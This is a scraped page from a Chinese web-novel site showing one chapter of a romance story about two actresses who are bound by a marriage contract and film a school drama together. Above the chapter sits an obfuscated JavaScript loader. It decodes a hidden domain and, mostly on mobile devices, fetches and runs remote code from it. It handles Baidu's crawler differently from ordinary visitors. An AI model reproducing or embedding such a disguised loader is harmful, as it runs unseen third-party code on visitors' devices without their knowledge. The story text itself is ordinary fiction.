98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuamJzZGprYmNzY2QuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(43(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

景知安和郑遂心之间,因为之前在白家的亲密接触,氛围变得很不一样。也许郑遂心是个吃货,那天尝了尝书呆子的味道,出乎意料地好,从此就惦记上,一直伺机再尝一次,然而景知安却一直维持着冷漠以对的态度,接连好几星期把郑遂心当透明,对她的招惹权当看不见。景知安最近开始利用晚自习时间,在一家饰品店上夜班,每天晚上要看店,到接近十一点才下班。

郑遂心在走廊拦住她,用一副本小姐包养你的口吻说你很缺钱?

景知安的一双大眼睛本来就会说话,那意思是与你何干。

那我雇佣你,做我女人呗。郑遂心摸摸鼻子,你开个价。

景知安把她当路障绕了过去。

过了。

孟璟从苏助理手中接过水瓶,拧开来递给未婚妻。

宋若轻轻摆了摆手,并没有接,扭过脸和同组里别的演员说话。

孟璟眼望着未婚妻的背影,勾勾嘴角,喝了口凉凉的矿泉水。

躲,继续躲。

随着拍摄进度的推进,孟璟越来越发现,《安知我心》这剧本,真差不多是为她和未婚妻量身打造的。

这郑遂心就连追女朋友用的招数都和自己差不多。

死缠烂打。

不到黄河心不死。

这天晚上是外景拍摄。

景知安坐在饰品店内,有客人时与客人交涉,或是打开橱柜,给顾客拿饰品,垂着睫毛打包。没有客人的时候,就安安静静地看书,或是拿着铅笔在一个巨大的素描本上涂涂画画。整个人安静得就像不存在。

郑遂心外套随便罩在身上,松松垮垮地坐在街边的栏杆上,叼着烟,有时点燃有时不点,唯一不变的是她的眼睛,一瞬不瞬朝一个方向盯着,隔着橱窗的少女似乎对她的凝视一无所知。

下班了,景知安关了店内的灯,锁门,沿着街道走回家。

郑遂心在马路对面,保持着与她一致的步调。

午夜时分秋天的街景是有点萧索的暗。

景知安的身影被拉得很长很长。

风吹过,孟璟裹紧了身上单薄的外套。

倪俊看着镜头里的景象,默默不语。

副导演砸砸嘴,喝一口保温杯里的枸杞茶,小孟表情挺暖。

李滔滔而且好像哪里有点痛,很经典的暖伤表情了。

这个隔着一条街送心上人回家的场景要连拍四五次。

每次两个人都得换衣服。

收工时已经到了午夜时分。

两人坐苏小康开来的保姆车回酒店。

未婚妻靠在座椅上很快睡着,孟璟也就保持安静,一瞬不瞬地看着她。

她的睡颜宁静,嘴唇像是玫瑰花瓣一样娇软,看着色泽就够诱人的,让人非常想去吻上一吻。做试卷第一个晚上有那么个机会,她那时候作势要亲未婚妻,未婚妻的反应不是推开她,而是红了脸。现在她已经羞成这样,距离她主动吻上来那天还远吗?

失去控制的小未婚妻是什么样子呢。

苏小康将车停稳,回头怪异地望着她,小孟总?

啊?

您笑得好开心啊。

啊是吗。

宋若醒了,孟璟赶忙整肃表情。

两个人同乘电梯,到了房间门口,孟璟忽然开口和我约会吧。

宋若愣了一愣,但她很快想起来是剧本里的台词,看了她一眼,现在不对戏。

不是对戏,我认真的,等戏拍完,老婆和我约会好不好?孟璟一脸温软的表情。

宋若还有些懵懵的,戏拍完就回去上课了。

孟璟轻声一笑,笑自己的命苦,怎么就喜欢上这么个小榆木疙瘩,抬手拍拍她的肩,我有个提议。

宋若嗯?

咱们把契约撕了吧。孟璟快速俯身到她耳边,轻声说。

宋若退开一点点,捂住被点燃的耳垂,摇摇头,我要休息了。

孟璟也没多说,晚安,小药瓶子。

宋若回到房间,还微微蹙着眉,小药瓶子到底是什么。

刚坐下,陌生号码来电。

宋若倒有点意外,这么晚,是谁呢。

喂,您好。

若若。我是姑姑。

姑姑。宋若喝水的动作顿了一顿。是的了。原主还有个姑姑来着。宋若脑海里出现一个瘦瘦的白领女郎的形象。她来这个世界睁开眼见到的第一个人,就是这位宋小青女士。

姑姑好。

若若,你怎么宋小青是和她差不多的细嗓子,说话温声细语,成了明星了?表弟想你了,天天缠着我要见大明星姐姐。

不是什么明星啦。宋若坐到阳台去,寒假之前,我恐怕没有时间去看你们了。

哎,今年春节来姑姑家吧。宋小青在那边说,爷爷走的第一年,咱们一起去祭拜一下。

宋若说了声好。

那若若,你早点休息。

嗯,您也是。

今天手机业务繁忙,电话挂掉,秦萌发来自拍。

小娇妻抱着一叠书,对着镜头笑得十分灿烂。

宋若将手机翻过去盖在桌子上,揉着额角。

《温柔待我》的片酬已经打到她的卡上了。有了这笔钱,至少直至大学毕业都有了经济保障。

即使出现小娇妻二号,孟璟与她分道扬镳,以两个人目前的关系,抹香鲸至少不会为难她。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间